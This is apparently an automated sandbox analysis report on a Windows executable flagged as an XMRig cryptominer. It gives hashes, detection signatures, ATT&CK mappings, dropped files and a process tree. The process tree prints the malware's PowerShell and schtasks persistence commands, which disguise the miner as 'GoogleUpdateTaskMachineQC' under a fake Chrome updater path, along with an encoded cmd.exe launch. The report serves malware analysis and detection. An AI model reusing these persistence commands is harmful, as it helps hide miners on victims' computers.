Overview

overview

10

Static

static

f6fd2a4333...4d.exe

windows7-x64

10

f6fd2a4333...4d.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20220901-en
  • resource tags

    arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
  • submitted
    27-09-2022 05:48

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    f6fd2a4333007f65beef7609077ec14d.exe

  • Size

    2.2MB

  • MD5

    f6fd2a4333007f65beef7609077ec14d

  • SHA1

    3740133e77fae5ee1c0ed1cb0493af5557e3562a

  • SHA256

    b2c7dfbe576c1962cd647917207e957d17dbe367c36dde071054f12beac68499

  • SHA512

    43c8b557b1bbfb353d4fe37d09c4dd94c7aaab9d9a6fda421144e40e81e2732df7dbd9faa67ca0e1779e787a8771fbcd9496dee2ae03530462910d1393e513d7

  • SSDEEP

    49152:C30HPteDTvEXI2s+HNZlZT+DM+dRQYpeV+wj:CgPteDTsIInZWM+bpeV+

Score
10/10
xmrigminerupx

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 2 IoCs
    miner
  • Blocklisted process makes network request 14 IoCs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 45 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f6fd2a4333007f65beef7609077ec14d.exe
    "C:\Users\Admin\AppData\Local\Temp\f6fd2a4333007f65beef7609077ec14d.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1056
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell <#lipfordu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1080
      • C:\Windows\system32\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'
        3⤵
        • Creates scheduled task(s)
        PID:1628
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell <#oqazi#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:684
      • C:\Windows\system32\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
        3⤵
          PID:1752
    • C:\Windows\system32\taskeng.exe
      taskeng.exe {3116E96D-3DA9-4A2F-BD48-8057014C333D} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]
      1⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1236
      • C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
        C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:1488
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell <#lipfordu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
          3⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:848
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'
            4⤵
            • Creates scheduled task(s)
            PID:1812
        • C:\Windows\system32\cmd.exe
          cmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1956
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic PATH Win32_VideoController GET Name, VideoProcessor
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1388
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe mrcpapowlrrgcvjb 6E3sjfZq2rJQaxvLPmXgsEqPiBiBLmVqlQRiqAROwnq+r3PgsvOI5CPEjWBkfjMBWeIX+GdZdCENkRpNNWWuUuiiT0nhr8xABS5D2B/qge2fBy16M7G/el0gdMCErX4jNqcnUz2ARFIRcMCpcOiMWItfgkpYfgbwioV0ioLoGuNMU42qRMuIsqjDs2FXseGAy1L1fh1Re+jaH/pdMkIbkcsE1vSzYIpH8WyjqEMFAlci5CLdLe97i0VD0mpaS+Gd+daXi5rj++LAHgkUTDqtbVL59AFDJZ9WYwE1hVlCLXncC2+//LOROJeHXBaIJ7E+zEF1XB8rOli3v9a2WUYdKol3fQS1Z2oPF18nYGSur3scnVljXe+vL6dRgItNbPO7
          3⤵
          • Blocklisted process makes network request
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:548

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Scheduled Task

    1
    T1053

    Persistence

    Scheduled Task

    1
    T1053

    Privilege Escalation

    Scheduled Task

    1
    T1053

    Defense Evasion

    Credential Access

    Discovery

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
      Filesize

      2.2MB

      MD5

      d081ded7aeebd495ea24b5531168f315

      SHA1

      21db4bae653ece87474e7121a8b60d9fd08208c9

      SHA256

      6e077c8a35fb28692230158cb9d80104cad9be31c06d64eb091c4cab81669d6a

      SHA512

      45dd10bcf9bcd298060ddd6a9e8afc4a938d490db632d9b1ff2c1826975be35009b87d2d7b9a4e2869882aa41dafeb6aba23d8fd4c9d11996b5ffbc8a095c8a0

      Download Submit
    • C:\Users\Admin\AppData\Roaming\Google\Libs\g.log
      Filesize

      198B

      MD5

      37dd19b2be4fa7635ad6a2f3238c4af1

      SHA1

      e5b2c034636b434faee84e82e3bce3a3d3561943

      SHA256

      8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

      SHA512

      86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

      Download Submit
    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
      Filesize

      7KB

      MD5

      d8935c690970e1088bef85c07c25cafc

      SHA1

      50cbf340a7ffc4a6f7fe2fff1d0212e306196cb5

      SHA256

      eb05da2b2aa139a442c393277f10753d743b552bf5de2a733acca359678ccb7c

      SHA512

      f5a01046ba1ff315c4f06f072a62bf574522a827c58098ec8179b007c778bd337c1d8261a0e28cbc1bf28c11e0150e9c30a7c9888c31e7e4a8af5bb228fef057

      Download Submit
    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
      Filesize

      7KB

      MD5

      d8935c690970e1088bef85c07c25cafc

      SHA1

      50cbf340a7ffc4a6f7fe2fff1d0212e306196cb5

      SHA256

      eb05da2b2aa139a442c393277f10753d743b552bf5de2a733acca359678ccb7c

      SHA512

      f5a01046ba1ff315c4f06f072a62bf574522a827c58098ec8179b007c778bd337c1d8261a0e28cbc1bf28c11e0150e9c30a7c9888c31e7e4a8af5bb228fef057

      Download Submit
    • \Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
      Filesize

      2.2MB

      MD5

      d081ded7aeebd495ea24b5531168f315

      SHA1

      21db4bae653ece87474e7121a8b60d9fd08208c9

      SHA256

      6e077c8a35fb28692230158cb9d80104cad9be31c06d64eb091c4cab81669d6a

      SHA512

      45dd10bcf9bcd298060ddd6a9e8afc4a938d490db632d9b1ff2c1826975be35009b87d2d7b9a4e2869882aa41dafeb6aba23d8fd4c9d11996b5ffbc8a095c8a0

      Download Submit
    • memory/548-89-0x0000000140000000-0x00000001407F4000-memory.dmp
      Filesize

      8.0MB

      Download
    • memory/548-88-0x00000001407F25D0-mapping.dmp
      Download
    • memory/548-90-0x00000000000E0000-0x0000000000100000-memory.dmp
      Filesize

      128KB

      Download
    • memory/548-91-0x0000000140000000-0x00000001407F4000-memory.dmp
      Filesize

      8.0MB

      Download
    • memory/684-70-0x00000000024A4000-0x00000000024A7000-memory.dmp
      Filesize

      12KB

      Download
    • memory/684-63-0x0000000000000000-mapping.dmp
      Download
    • memory/684-66-0x000007FEF3F00000-0x000007FEF4923000-memory.dmp
      Filesize

      10.1MB

      Download
    • memory/684-67-0x000007FEF33A0000-0x000007FEF3EFD000-memory.dmp
      Filesize

      11.4MB

      Download
    • memory/684-68-0x00000000024A4000-0x00000000024A7000-memory.dmp
      Filesize

      12KB

      Download
    • memory/684-71-0x00000000024AB000-0x00000000024CA000-memory.dmp
      Filesize

      124KB

      Download
    • memory/848-83-0x0000000002964000-0x0000000002967000-memory.dmp
      Filesize

      12KB

      Download
    • memory/848-80-0x0000000002964000-0x0000000002967000-memory.dmp
      Filesize

      12KB

      Download
    • memory/848-84-0x000000000296B000-0x000000000298A000-memory.dmp
      Filesize

      124KB

      Download
    • memory/848-81-0x000000001B6E0000-0x000000001B9DF000-memory.dmp
      Filesize

      3.0MB

      Download
    • memory/848-79-0x000007FEF3D40000-0x000007FEF489D000-memory.dmp
      Filesize

      11.4MB

      Download
    • memory/848-75-0x0000000000000000-mapping.dmp
      Download
    • memory/848-78-0x000007FEF48A0000-0x000007FEF52C3000-memory.dmp
      Filesize

      10.1MB

      Download
    • memory/1080-60-0x00000000022EB000-0x000000000230A000-memory.dmp
      Filesize

      124KB

      Download
    • memory/1080-61-0x00000000022E4000-0x00000000022E7000-memory.dmp
      Filesize

      12KB

      Download
    • memory/1080-57-0x000007FEF3D40000-0x000007FEF489D000-memory.dmp
      Filesize

      11.4MB

      Download
    • memory/1080-55-0x000007FEFC2F1000-0x000007FEFC2F3000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1080-54-0x0000000000000000-mapping.dmp
      Download
    • memory/1080-62-0x00000000022EB000-0x000000000230A000-memory.dmp
      Filesize

      124KB

      Download
    • memory/1080-56-0x000007FEF48A0000-0x000007FEF52C3000-memory.dmp
      Filesize

      10.1MB

      Download
    • memory/1080-58-0x00000000022E4000-0x00000000022E7000-memory.dmp
      Filesize

      12KB

      Download
    • memory/1388-86-0x0000000000000000-mapping.dmp
      Download
    • memory/1488-73-0x0000000000000000-mapping.dmp
      Download
    • memory/1628-59-0x0000000000000000-mapping.dmp
      Download
    • memory/1752-69-0x0000000000000000-mapping.dmp
      Download
    • memory/1812-82-0x0000000000000000-mapping.dmp
      Download
    • memory/1956-85-0x0000000000000000-mapping.dmp
      Download